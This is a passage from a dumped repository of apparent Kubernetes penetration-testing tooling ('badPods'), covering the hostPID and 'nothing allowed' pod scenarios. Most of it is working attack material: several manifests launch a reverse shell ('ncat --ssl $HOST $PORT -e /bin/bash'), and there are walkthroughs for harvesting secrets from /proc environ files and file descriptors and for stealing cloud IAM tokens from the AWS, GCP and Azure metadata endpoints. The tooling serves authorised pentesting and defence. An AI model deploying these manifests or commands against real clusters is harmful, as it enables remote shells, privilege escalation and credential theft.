hostPID](#bad-pod-5-hostpid) 13 | - [Table of Contents](#table-of-contents) 14 | - [Pod creation & access](#pod-creation--access) 15 | - [Exec pods](#exec-pods) 16 | - [Reverse shell pods](#reverse-shell-pods) 17 | - [Deleting resources](#deleting-resources) 18 | - [Post exploitation](#post-exploitation) 19 | - [View all processes running on the host and look for passwords, tokens, keys, etc.](#view-all-processes-running-on-the-host-and-look-for-passwords-tokens-keys-etc) 20 | - [View the environment variables for each pod on the host](#view-the-environment-variables-for-each-pod-on-the-host) 21 | - [View the file descriptors for each pod on the host](#view-the-file-descriptors-for-each-pod-on-the-host) 22 | - [Also, you can also kill any process, but don't do that in production :)](#also-you-can-also-kill-any-process-but-dont-do-that-in-production-) 23 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 24 | - [Demonstrate impact](#demonstrate-impact) 25 | - [References and further reading:](#references-and-further-reading) 26 | 27 | # Pod creation & access 28 | 29 | ## Exec pods 30 | Create one or more of these resource types and exec into the pod 31 | 32 | **Pod** 33 | ```bash 34 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml 35 | kubectl exec -it hostpid-exec-pod -- bash 36 | ``` 37 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 38 | 39 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 40 | 41 | ```bash 42 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/[RESOURCE_TYPE]/hostpid-exec-[RESOURCE_TYPE].yaml 43 | kubectl get pods | grep hostpid-exec-[RESOURCE_TYPE] 44 | kubectl exec -it hostpid-exec-[RESOURCE_TYPE]-[ID] -- bash 45 | ``` 46 | 47 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 48 | 49 | To troubleshoot a case where you don't see pods, use `kubectl describe` 50 | 51 | ``` 52 | kubectl describe hostpid-exec-[RESOURCE_TYPE] 53 | ``` 54 | 55 | ## Reverse shell pods 56 | Create one or more of these resources and catch the reverse shell 57 | 58 | **Step 1: Set up listener** 59 | ```bash 60 | ncat --ssl -vlp 3116 61 | ``` 62 | 63 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 64 | 65 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 66 | * Replace the HOST and PORT values to point the reverse shell to your listener 67 | * 68 | ```bash 69 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostpid/[RESOURCE_TYPE]/hostpid-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 70 | ``` 71 | 72 | **Step 3: Catch the shell** 73 | ```bash 74 | $ ncat --ssl -vlp 3116 75 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 76 | Ncat: Listening on :::3116 77 | Ncat: Listening on 0.0.0.0:3116 78 | Connection received on 10.0.0.162 42035 79 | ``` 80 | 81 | ## Deleting resources 82 | You can delete a resource using it's manifest, or by name. Here are some examples: 83 | ``` 84 | kubectl delete [type] [resource-name] 85 | kubectl delete -f manifests/hostpid/pod/hostpid-exec-pod.yaml 86 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml 87 | kubectl delete pod hostpid-exec-pod 88 | kubectl delete cronjob hostpid-exec-cronjob 89 | ``` 90 | 91 | # Post exploitation 92 | 93 | ## View all processes running on the host and look for passwords, tokens, keys, etc. 94 | ```bash 95 | ps -aux 96 | ...omitted for brevity... 97 | root 2123072 0.0 0.0 3732 2868 ? Ss 21:00 0:00 /bin/bash -c while true; do ./my-program --grafana-uername=admin --grafana-password=admin; sleep 10;done 98 | ...omitted for brevity... 99 | ``` 100 | Check out that clear text password in the ps output below! 101 | 102 | ## View the environment variables for each pod on the host 103 | The following command lists the environ file for each process if the process is running as UID 0. See the note below on how to access PIDs running as a non-root UID. The command then uses `xargs` to split up the output so that each environment variable is on it's own line: 104 | 105 | ```bash 106 | for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done > envs.txt 107 | ``` 108 | 109 | Now it's time to look for interesting environment variables. 110 | ```bash 111 | root@hostpid-exec-pod:/# less envs.txt 112 | ...omitted for brevity... 113 | 114 | /proc/578808/environ 115 | PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 116 | HOSTNAME=envar-demo 117 | NPM_CONFIG_LOGLEVEL=info 118 | NODE_VERSION=4.4.2 119 | DEMO_FAREWELL=Such a sweet sorrow 120 | DEMO_GREETING=Hello from the environment 121 | AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE 122 | AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 123 | ...omitted for brevity... 124 | ``` 125 | Oh look, an AWS IAM user key and secret! 126 | 127 | **Note: This only works on containers, not the host** 128 | 129 | As far as I know, there is no way to get the environment variables from the host processes. This only works for other containers. 130 | 131 | **Note: To get environment variables for processes owned by a non-root user, you need to do some extra work** 132 | 133 | The for loop shown above only grabs environment variables from processes running within pods that share same UID as your hostPID pod. By default, the badPods run as UID 0. Using our current `hostpid` pod, let's see what other pids are running: 134 | 135 | ```bash 136 | root@hostpid-exec-pod:/# ps auxn | awk '{print $1}' | sort | uniq -c | sort -rn 137 | 205 0 138 | 9 999 139 | 8 1000 140 | 5 101 141 | 1 USER 142 | 1 104 143 | 1 103 144 | 1 102 145 | 1 1001 146 | 1 100 147 | 1 1 148 | ``` 149 | You can see that most processes on my cluster are running as root, but there are 9 PIDs running as UID 999. The only way I know to get the environment variables from those processes is to run a new pod with the runAsUser set to the desired UID. Thanks to @rkervella for figuring that one out! Here's an example: 150 | 151 | ```bash 152 | cat hostpid-exec-pod-999.yaml 153 | apiVersion: v1 154 | kind: Pod 155 | metadata: 156 | name: hostpid-exec-pod-999 157 | labels: 158 | app: pentest 159 | spec: 160 | securityContext: 161 | runAsUser: 999 162 | runAsGroup: 999 163 | hostPID: true 164 | containers: 165 | - name: hostpid-pod-999 166 | image: ubuntu 167 | command: [ "/bin/sh", "-c", "--" ] 168 | args: [ "while true; do sleep 30; done;" ] 169 | ``` 170 | 171 | Now let's try it again from within our new pod running as UID/GID 999: 172 | 173 | ```bash 174 | I have no name!@hostpid-exec-pod-999:/$ for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done 175 | ...omitted for brevity... 176 | /proc/988058/environ 177 | PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 178 | HOSTNAME=argocd-server-69678b4f65-6mmql 179 | USER=argocd 180 | ARGOCD_METRICS_PORT=tcp://10.96.157.195:8082 181 | ARGOCD_REPO_SERVER_PORT=tcp://10.97.112.203:8081 182 | ARGOCD_REPO_SERVER_PORT_8084_TCP_PROTO=tcp 183 | ARGOCD_REPO_SERVER_PORT_8084_TCP_PORT=8084 184 | ARGOCD_SERVER_PORT_80_TCP_PORT=80 185 | ``` 186 | 187 | There we go! At some point I'll probably automate this so that I can spin up a new pod for each UID on the host. 188 | 189 | ## View the file descriptors for each pod on the host 190 | The following command lists out the file descriptors for each PID that we have access to. See the note below on how to access FDs for non-root PIDs. 191 | 192 | ```bash 193 | for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt 194 | ``` 195 | 196 | Now it's time to look for interesting files. Oh look, a vim swp file! 197 | ```bash 198 | less fds.txt 199 | ...omitted for brevity... 200 | lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/2 -> /dev/pts/0 201 | lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp 202 | lrwx------ 1 root root 64 Jun 15 02:26 /proc/635975/fd/0 -> /dev/null 203 | l-wx------ 1 root root 64 Jun 15 02:26 /proc/635975/fd/1 -> pipe:[65069205] 204 | ``` 205 | 206 | Let's see what's in `/.secret.txt.swp`. This file exists within a container, but we can access it by reading `/proc/635813/fd/4`! 207 | 208 | ```bash 209 | cat /proc/635813/fd/4 210 | 3210#"! UtadBnnmAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYI'm going to keep my secrets in this file! 211 | ``` 212 | More secrets! 213 | 214 | **To access the FDs for PIDs owned by a non-root user, you need to do some extra work** 215 | 216 | The note about permissions in the previous section applies here as well. To access the file descriptors associated with processes within containers that are not running as UID 0, you'll need to spin up additional pods - one pod per UID you see on the host. 217 | 218 | 219 | ## Also, you can also kill any process, but don't do that in production :) 220 | ``` 221 | pkill -f "nginx" 222 | ``` 223 | 224 | ## Attacks that apply to all pods, even without any special permissions 225 | * Cloud metadata service 226 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 227 | * Kubernetes exploits 228 | * Hunting for vulnerable application/services in the cluster 229 | 230 | # Demonstrate impact 231 | 232 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 233 | 234 | # References and further reading: 235 | -------------------------------------------------------------------------------- /manifests/hostpid/cronjob/hostpid-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpid-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: hostpid-exec-cronjob 17 | image: ubuntu 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "while true; do sleep 30; done;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | -------------------------------------------------------------------------------- /manifests/hostpid/cronjob/hostpid-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpid-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: hostpid-revshell-cronjob 17 | image: raesene/ncat 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | -------------------------------------------------------------------------------- /manifests/hostpid/deamonset/hostpid-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpid-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-exec-daemonset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/deamonset/hostpid-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpid-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-revshell-daemonset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/deployment/hostpid-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpid-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: hostpid-exec-deployment 23 | image: ubuntu 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/hostpid/deployment/hostpid-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpid-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: hostpid-revshell-deployment 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/hostpid/job/hostpid-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpid-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: hostpid-exec-job 14 | image: ubuntu 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "while true; do sleep 30; done;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostpid/job/hostpid-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpid-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: hostpid-revshell-job 14 | image: raesene/ncat 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostpid/pod/hostpid-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpid-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: hostpid-pod 11 | image: ubuntu 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "while true; do sleep 30; done;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | -------------------------------------------------------------------------------- /manifests/hostpid/pod/hostpid-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpid-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: hostpid-pod 11 | image: raesene/ncat 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/hostpid/replicaset/hostpid-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpid-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-exec-replicaset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/replicaset/hostpid-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpid-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-revshell-replicaset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/replicationcontroller/hostpid-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpid-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-exec-replicationcontroller 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/replicationcontroller/hostpid-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpid-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-revshell-replicationcontroller 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/statefulset/hostpid-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpid-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpid-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpid-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: hostpid-exec-statefulset 38 | image: ubuntu 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "while true; do sleep 30; done;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | -------------------------------------------------------------------------------- /manifests/hostpid/statefulset/hostpid-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpid-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpid-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpid-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: hostpid-revshell-statefulset 38 | image: raesene/ncat 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #8: Nothing allowed 2 | ![](../../.github/images/Pod8.jpg) 3 | 4 | The pod security policy or admission controller has blocked access to all of the host's namespaces and restricted all capabilities. **Do not despair**, especially if the target cluster is running in a cloud environment. 5 | 6 | ## Table of Contents 7 | - [Bad Pod #8: Nothing allowed](#bad-pod-8-nothing-allowed) 8 | - [Table of Contents](#table-of-contents) 9 | - [Pod creation & access](#pod-creation--access) 10 | - [Exec pods](#exec-pods) 11 | - [Reverse shell pods](#reverse-shell-pods) 12 | - [Post exploitation](#post-exploitation) 13 | - [Cloud metadata](#cloud-metadata) 14 | - [AWS](#aws) 15 | - [GCP](#gcp) 16 | - [Overly permissive service account](#overly-permissive-service-account) 17 | - [Anonymous-auth](#anonymous-auth) 18 | - [Exploits](#exploits) 19 | - [Traditional vulnerability hunting](#traditional-vulnerability-hunting) 20 | - [Reference(s):](#references) 21 | 22 | # Pod creation & access 23 | 24 | ## Exec pods 25 | Create one or more of these resource types and exec into the pod 26 | 27 | **Pod** 28 | ```bash 29 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml 30 | kubectl exec -it nothing-allowed-exec-pod -- bash 31 | ``` 32 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 33 | 34 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 35 | 36 | ```bash 37 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/[RESOURCE_TYPE]/nothing-allowed-exec-[RESOURCE_TYPE].yaml 38 | kubectl get pods | grep nothing-allowed-exec-[RESOURCE_TYPE] 39 | kubectl exec -it nothing-allowed-exec-[RESOURCE_TYPE]-[ID] -- bash 40 | ``` 41 | 42 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 43 | 44 | To troubleshoot a case where you don't see pods, use `kubectl describe` 45 | 46 | ``` 47 | kubectl describe nothing-allowed-exec-[RESOURCE_TYPE] 48 | ``` 49 | 50 | ## Reverse shell pods 51 | Create one or more of these resources and catch the reverse shell 52 | 53 | **Step 1: Set up listener** 54 | ```bash 55 | ncat --ssl -vlp 3116 56 | ``` 57 | 58 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 59 | 60 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 61 | * Replace the HOST and PORT values to point the reverse shell to your listener 62 | * 63 | ```bash 64 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/nothing-allowed/[RESOURCE_TYPE]/nothing-allowed-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 65 | ``` 66 | 67 | **Step 3: Catch the shell** 68 | ```bash 69 | $ ncat --ssl -vlp 3116 70 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 71 | Ncat: Listening on :::3116 72 | Ncat: Listening on 0.0.0.0:3116 73 | Connection received on 10.0.0.162 42035 74 | ``` 75 | 76 | # Post exploitation 77 | 78 | ## Cloud metadata 79 | If the cluster is cloud hosted, try to access the cloud metadata service. You might get access to the IAM credentials associated with the node or even just find a cloud IAM credential created specifically for that pod. In either case, this can be your path to escalate within the cluster, within the cloud environment, or in both. 80 | ### AWS 81 | **Test to see if you have access to the metadata service:** 82 | ```bash 83 | curl http://169.254.169.254/latest/meta-data 84 | #IMDSv2 85 | TOKEN="$(curl --silent -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 600" http://169.254.169.254/latest/api/token)" 86 | curl --silent -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data" 87 | ``` 88 | 89 | 90 | **See if any instance user-data is populated. Look for credentials, kubelet info, or bucket names** 91 | ```bash 92 | curl http://169.254.169.254/latest/user-data 93 | ``` 94 | 95 | **If an IAM role is assigned to the node, you can access the node's identify token** 96 | ``` 97 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ #Lists the role name 98 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] # Get creds 99 | ``` 100 | 101 | **Launch a new pod with the aws-cli** 102 | 103 | If you can query the metadata service, you can proceed with curl, but I suggest deploying another pod with the `amazon/aws-cli` image. This allows you to use `aws` as the node. 104 | Something like this: 105 | 106 | ```yaml 107 | apiVersion: v1 108 | kind: Pod 109 | metadata: 110 | name: nothing-allowed-awscli-pod 111 | labels: 112 | app: pentest 113 | spec: 114 | containers: 115 | - name: nothing-allowed-awscli-pod 116 | image: amazon/aws-cli 117 | command: [ "/bin/sh", "-c", "--" ] 118 | args: [ "while true; do sleep 30; done;" ] 119 | ``` 120 | 121 | **Verify you are the node** 122 | ``` 123 | aws sts get-caller-identity 124 | ``` 125 | 126 | **Some recon ideas** 127 | ``` 128 | yum install jq 129 | aws eks get-token --cluster-name clusterName --region us-east-1 | jq . 130 | aws eks describe-cluster --name clusterName 131 | aws s3 ls 132 | 133 | ``` 134 | 135 | ### GCP 136 | Test to see if you have access to the metadata service: 137 | ``` 138 | curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/' 139 | 126817330210-compute@developer.gserviceaccount.com/ 140 | default/ 141 | ``` 142 | 143 | **See permissions assigned to default service account** 144 | ``` 145 | curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/ 146 | https://www.googleapis.com/auth/devstorage.read_only 147 | https://www.googleapis.com/auth/logging.write 148 | https://www.googleapis.com/auth/monitoring 149 | https://www.googleapis.com/auth/servicecontrol 150 | https://www.googleapis.com/auth/service.management.readonly 151 | https://www.googleapis.com/auth/trace.append 152 | ``` 153 | 154 | **Launch a new pod with the cloud-sdk** 155 | 156 | If you can query the metadata service, you can proceed with curl, but I suggest deploying another pod with the `gcr.io/google.com/cloudsdktool/cloud-sdk:latest` image. This allows you to use `gcloud` and `gsutil` as the node. 157 | Something like this: 158 | 159 | ```yaml 160 | apiVersion: v1 161 | kind: Pod 162 | metadata: 163 | name: nothing-allowed-gcloud-pod 164 | labels: 165 | app: pentest 166 | spec: 167 | containers: 168 | - name: nothing-allowed-gcloud-pod 169 | image: gcr.io/google.com/cloudsdktool/cloud-sdk:latest 170 | command: [ "/bin/sh", "-c", "--" ] 171 | args: [ "while true; do sleep 30; done;" ] 172 | ``` 173 | 174 | **Example: Find buckets, list objects, and read file contents** 175 | ``` 176 | root@nothing-allowed-gcloud-pod:/# gsutil ls 177 | gs://playground-test123/ 178 | 179 | root@nothing-allowed-gcloud-pod:/# gsutil ls gs://playground-test123 180 | gs://playground-test123/luggage_combination.txt 181 | 182 | root@nothing-allowed-gcloud-pod:/# gsutil cat gs://playground-test123/luggage_combination.txt 183 | 12345 184 | ``` 185 | 186 | An awesome GCP privesc reference: https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ 187 | 188 | ### Azure 189 | 190 | **Test to see if you have access to the metadata service** 191 | ``` 192 | curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2020-10-01" | jq . 193 | ``` 194 | 195 | **If a managed identity is assigned to the node, you can access the node's identify token** 196 | ``` 197 | curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"| jq . 198 | ``` 199 | 200 | **Launch a new pod with the azure-cli** 201 | If you can query the metadata service, you can proceed with curl, but I suggest deploying another pod with the `mcr.microsoft.com/azure-cli` image. This allows you to use `az` as the node. 202 | 203 | Something like this: 204 | 205 | ```yaml 206 | apiVersion: v1 207 | kind: Pod 208 | metadata: 209 | name: nothing-allowed-azurecli-pod 210 | labels: 211 | app: pentest 212 | spec: 213 | containers: 214 | - name: nothing-allowed-azurecli-pod 215 | image: mcr.microsoft.com/azure-cli 216 | command: [ 